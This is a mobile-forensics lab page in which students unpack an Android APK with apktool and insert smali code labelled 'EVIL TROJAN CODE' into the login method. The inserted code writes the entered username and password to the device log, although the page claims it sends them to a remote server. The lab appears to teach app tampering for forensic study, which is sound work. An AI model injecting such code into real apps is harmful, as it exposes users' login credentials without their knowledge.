Topics


Interaction

  Contributions  

Activity 2 - Mobile Forensics

 

Re-building the APK File

Estimated Time : 30 Minutes

Objective

In this Activity 2, APK file is extracted to a folder and malicious code is injected into one of the files.

Description

After generating a signed APK file in Activity 1, we will extract it into a folder structure and inject a malicious code into one of the files. This code will take a copy of login credentials entered on the app and sends to a remote server unnoticed.

Artifacts

Click below link to download files.
login.apk

p9cert.jks

Instructions

  • Step 1: Download the file "apktool_2.0.0rc3.jar" from below given link. With help of this jar file, we will extract the "app-release.apk" file created in Activity 1 and see the files content.
    •    https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.0.0rc3.jar

  • Step 2: Now place the downloaded file in the same directory where "app-release.apk" exists.
    •    

  • Step 3: Open command prompt and go to folder location where files "apktool_2.0.0rc3.jar" & "app-release.apk" are present.

  • Step 4: Run below command to extract the apk file into a folder structure.
    •    java -jar apktool_2.0.0rc3.jar d app-release.apk
       

  • Step 5: Go inside app-release folder and observe the sub-folders

  • Step 6: There are several files with extension as ".smali" inside sub-folder called "smali" under app-release
    •    

  • Step 7: Search for file "RestClient.smali" and open it in any text editor (Example: Notepad++). Now find the method "performLogin" in the code.

  • Step 8: Add below piece of code after ".line 258" in the file.

    •    # EVIL TROJAN CODE LOGGING PASSWORD
       const-string v0, "TTUPROJECT"
       const-string v1, "USERNAME AND PASSWORD BELOW"
       invoke-static {v0, v1}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
       invoke-static {v0, p3}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
       invoke-static {v0, p4}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
       # END OF EVIL TROJAN CODE


       

       

  • Step 9: Save the code changes in "RestClient.smali" file

Self-Assessment

Please complete the following self-assessment over Activity 2.
Start Assessment

This page was last edited on 29.07.2017 | Template by HTML5 Templates                
Privacy policy About Terms and conditions Cookie statement Developers